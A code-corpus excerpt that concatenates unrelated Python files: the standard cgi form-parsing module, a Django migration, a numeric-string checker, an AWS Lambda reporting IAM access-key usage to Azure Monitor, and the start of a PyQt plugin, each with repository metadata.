# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
from collections.abc import Mapping
import sys
import os
import urllib.parse
from email.parser import FeedParser
from email.message import Message
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage", "parse", "parse_multipart",
"parse_header", "test", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global log, logfile, logfp
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except OSError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
def closelog():
"""Close the log file."""
global log, logfile, logfp
logfile = ''
if logfp:
logfp.close()
logfp = None
log = initlog
log = initlog # The current logging function
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
if not 'REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
def parse_multipart(fp, pdict, encoding="utf-8", errors="replace"):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
encoding, errors: request encoding and error handler, passed to
FieldStorage
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. For non-file fields, the value
is a list of strings.
"""
# RFC 2026, Section 5.1 : The "multipart" boundary delimiters are always
# represented as 7bit US-ASCII.
boundary = pdict['boundary'].decode('ascii')
ctype = "multipart/form-data; boundary={}".format(boundary)
headers = Message()
headers.set_type(ctype)
headers['Content-Length'] = pdict['CONTENT-LENGTH']
fs = FieldStorage(fp, headers=headers, encoding=encoding, errors=errors,
environ={'REQUEST_METHOD': 'POST'})
return {k: fs.getlist(k) for k in fs}
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
The items are either a Python list (if there's multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
bytes* ; None if the data is stored a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace',
max_num_fields=None):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
max_num_fields: int. If set, then __init__ throws a ValueError
if there are more than n fields read by parse_qsl().
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
self.max_num_fields = max_num_fields
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
else:
if not (isinstance(headers, (Mapping, Message))):
raise TypeError("headers must be mapping or an instance of "
"email.message.Message")
self.headers = headers
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
if not (hasattr(fp, 'read') and hasattr(fp, 'readline')):
raise TypeError("fp must be file pointer")
self.fp = fp
self.encoding = encoding
self.errors = errors
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
self.innerboundary = pdict['boundary'].encode(self.encoding,
self.errors)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen >= 0:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __del__(self):
try:
self.file.close()
except AttributeError:
pass
def __enter__(self):
return self
def __exit__(self, *args):
self.file.close()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
def __bool__(self):
if self.list is None:
raise TypeError("Cannot be converted to bool.")
return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
qs += '&' + self.qs_on_post
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list = [MiniFieldStorage(key, value) for key, value in query]
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors,
max_num_fields=self.max_num_fields)
self.list.extend(MiniFieldStorage(key, value) for key, value in query)
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
# Ensure that we consume the file until we've hit our inner boundary
while (first_line.strip() != (b"--" + self.innerboundary) and
first_line):
first_line = self.fp.readline()
self.bytes_read += len(first_line)
# Propagate max_num_fields into the sub class appropriately
max_num_fields = self.max_num_fields
if max_num_fields is not None:
max_num_fields -= len(self.list)
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
# parser takes strings, not bytes
self.bytes_read += len(hdr_text)
parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
# Some clients add Content-Length for part headers, ignore them
if 'content-length' in headers:
del headers['content-length']
limit = None if self.limit is None \
else self.limit - self.bytes_read
part = klass(self.fp, headers, ib, environ, keep_blank_values,
strict_parsing, limit,
self.encoding, self.errors, max_num_fields)
if max_num_fields is not None:
max_num_fields -= 1
if part.list:
max_num_fields -= len(part.list)
if max_num_fields < 0:
raise ValueError('Max number of fields exceeded')
self.bytes_read += part.bytes_read
self.list.append(part)
if part.done or self.bytes_read >= self.length > 0:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
while 1:
if self.limit is not None and _read >= self.limit:
break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if delim == b"\r":
line = delim + line
delim = b""
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
elif line.endswith(b"\r"):
# We may interrupt \r\n sequences if they span the 2**16
# byte boundary
delim = b"\r"
line = line[:-1]
last_line_lfend = False
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
encoding=self.encoding, newline = '\n')
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except OSError as msg:
print("OSError:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def valid_boundary(s):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| [
"ci@git-for-windows.build"
] | ci@git-for-windows.build |
39f3d8f7e328e35f453d4f1c22d7fc1ca12b1f66 | 87df492e911f955ab39ad462c1f0bc7e71fed308 | /blog/migrations/0001_initial.py | bb0e41dd267a5a600550916a47129e99d51496e6 | [] | no_license | Rustamnurg/SuperAPI | 4efc3d7fbf3aed559210b3a9bc2d5598ffad9a99 | ced3fb8c87aedfe883913c25697c1b1d15c7b1ea | refs/heads/master | 2018-09-20T05:30:25.289318 | 2018-06-06T11:49:42 | 2018-06-06T11:49:42 | 126,050,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-03-15 08:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('device_id', models.BigIntegerField()),
('windows_id', models.BigIntegerField()),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"nurgaliev_rustam@namisoft.ru"
] | nurgaliev_rustam@namisoft.ru |
cf0aa22764dcdc0f335fb637f43812e18d622998 | c36edf21f868315e1a1f63cf8a88398c926b3a8b | /CodingInterviewChinese2-master_python/CodingInterviewChinese2-master/20_表示数值的字符串.py | 158447f441d2101851ac2c0b48c9efbe2f5bb14e | [] | no_license | kcmao/leetcode_exercise | 85037de7b148b7dc162c52c672510d260dfe3574 | e52e0e18b7cef923a5f0eb000968f4234199978f | refs/heads/master | 2020-04-11T01:57:50.254666 | 2019-08-04T13:02:28 | 2019-08-04T13:02:28 | 161,431,354 | 1 | 0 | null | 2019-05-27T14:35:49 | 2018-12-12T04:10:37 | Python | UTF-8 | Python | false | false | 1,098 | py | def is_numeric(string):
if not isinstance(string, str):
return False
index = 0
result, index = scan_integer(string, index)
if index < len(string) and string[index] == '.':
index += 1
has_float, index = scan_unsigned_integer(string, index)
result = result or has_float
if index < len(string) and string[index] in ('e', 'E'):
index += 1
has_exp, index = scan_integer(string, index)
result = result and has_exp
return result and index == len(string)
def scan_integer(string, index):
if index < len(string) and string[index] in ('-', '+'):
index += 1
return scan_unsigned_integer(string, index)
def scan_unsigned_integer(string, index):
old_index = index
while index < len(string) and string[index] in '0123456789':
index += 1
return (old_index != index), index
if __name__ == "__main__":
print(is_numeric("+100"))
print(is_numeric("5e2"))
print(is_numeric("-200"))
print(is_numeric("3.1415926"))
print(is_numeric("1.34e-2"))
print(is_numeric("1.34e"))
| [
"kc_mao@qq.com"
] | kc_mao@qq.com |
fac5e95d958639663214802e1a8b74418042fad4 | e744200bde3201e14b84b851c2dacf3627f66747 | /lambda_function.py | 476bd0bde6bb6e2fc7f4b8ac60a19e52d8c29481 | [
"MIT"
] | permissive | is-rishabhs/azure_monitor_poc | cf73800135720c2107032e00d0e2d23716dd0aff | 0b41083a29781fee2a7b39847c625cdb694a36ba | refs/heads/master | 2022-01-22T19:57:51.501249 | 2019-07-14T23:06:28 | 2019-07-14T23:06:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,190 | py | import json
import logging
import re
import csv
import boto3
import os
import hmac
import base64
import hashlib
import datetime
from io import StringIO
from datetime import datetime
from botocore.vendored import requests
# Parse the IAM User ARN to extract the AWS account number
def parse_arn(arn_string):
acct_num = re.findall(r'(?<=:)[0-9]{12}',arn_string)
return acct_num[0]
# Convert timestamp to one more compatible with Azure Monitor
def transform_datetime(awsdatetime):
transf_time = awsdatetime.strftime("%Y-%m-%dT%H:%M:%S")
return transf_time
# Query for a list of AWS IAM Users
def query_iam_users():
todaydate = (datetime.now()).strftime("%Y-%m-%d")
users = []
client = boto3.client(
'iam'
)
paginator = client.get_paginator('list_users')
response_iterator = paginator.paginate()
for page in response_iterator:
for user in page['Users']:
user_rec = {'loggedDate':todaydate,'username':user['UserName'],'account_number':(parse_arn(user['Arn']))}
users.append(user_rec)
return users
# Query for a list of access keys and information on access keys for an AWS IAM User
def query_access_keys(user):
keys = []
client = boto3.client(
'iam'
)
paginator = client.get_paginator('list_access_keys')
response_iterator = paginator.paginate(
UserName = user['username']
)
# Get information on access key usage
for page in response_iterator:
for key in page['AccessKeyMetadata']:
response = client.get_access_key_last_used(
AccessKeyId = key['AccessKeyId']
)
# Santize key before sending it along for export
sanitizedacctkey = key['AccessKeyId'][:4] + '...' + key['AccessKeyId'][-4:]
# Create new dictonionary object with access key information
if 'LastUsedDate' in response.get('AccessKeyLastUsed'):
key_rec = {'loggedDate':user['loggedDate'],'user':user['username'],'account_number':user['account_number'],
'AccessKeyId':sanitizedacctkey,'CreateDate':(transform_datetime(key['CreateDate'])),
'LastUsedDate':(transform_datetime(response['AccessKeyLastUsed']['LastUsedDate'])),
'Region':response['AccessKeyLastUsed']['Region'],'Status':key['Status'],
'ServiceName':response['AccessKeyLastUsed']['ServiceName']}
keys.append(key_rec)
else:
key_rec = {'loggedDate':user['loggedDate'],'user':user['username'],'account_number':user['account_number'],
'AccessKeyId':sanitizedacctkey,'CreateDate':(transform_datetime(key['CreateDate'])),'Status':key['Status']}
keys.append(key_rec)
return keys
def build_signature(customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(
hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id,encoded_hash)
return authorization
def post_data(customer_id, shared_key, body, log_type):
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = 'https://' + customer_id + '.ods.opinsights.azure.com' + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri,data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
print("Accepted")
else:
print("Response code: {}".format(response.status_code))
def lambda_handler(event, context):
# Enable logging to console
logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
try:
# Initialize empty records array
#
key_records = []
# Retrieve list of IAM Users
logging.info("Retrieving a list of IAM Users...")
users = query_iam_users()
# Retrieve list of access keys for each IAM User and add to record
logging.info("Retrieving a listing of access keys for each IAM User...")
for user in users:
key_records.extend(query_access_keys(user))
# Prepare data for sending to Azure Monitor HTTP Data Collector API
body = json.dumps(key_records)
post_data(os.environ['WorkspaceId'], os.environ['WorkspaceKey'], body, os.environ['LogName'])
except Exception as e:
logging.error("Execution error",exc_info=True)
| [
"noreply@github.com"
] | is-rishabhs.noreply@github.com |
a7806cbd020f9a30ef0b3337e9f90d839d99a427 | da92caf06447ec7e244dfa11e71b551a4dab7d14 | /src/plugins/evoked_average.py | 21e26af5a91a55b09c07c45812ed17bb1e6ac9ab | [
"MIT"
] | permissive | Frikster/Mesoscale-Brain-Explorer | 28298adbcb49dc399f85fe4db1c3dc1263468677 | 269d8f18162e2b9dca4619561e73a6beb8ba810c | refs/heads/master | 2020-04-04T22:17:29.714298 | 2017-11-20T16:24:19 | 2017-11-20T16:24:19 | 61,849,037 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 4,036 | py | #!/usr/bin/env python3
import os
import numpy as np
import psutil
import qtutil
from PyQt4.QtGui import *
from .util import project_functions as pfs
from .util.plugin import PluginDefault
from .util.plugin import WidgetDefault
class Widget(QWidget, WidgetDefault):
class Labels(WidgetDefault.Labels):
pass
class Defaults(WidgetDefault.Defaults):
manip = 'evoked-avg'
def __init__(self, project, plugin_position, parent=None):
super(Widget, self).__init__(parent)
if not project or not isinstance(plugin_position, int):
return
self.avg_button = QPushButton('Generate Evoked Average')
WidgetDefault.__init__(self, project, plugin_position)
def setup_ui(self):
super().setup_ui()
self.vbox.addWidget(self.avg_button)
def setup_signals(self):
super().setup_signals()
self.avg_button.clicked.connect(self.execute_primary_function)
def execute_primary_function(self, input_paths=None):
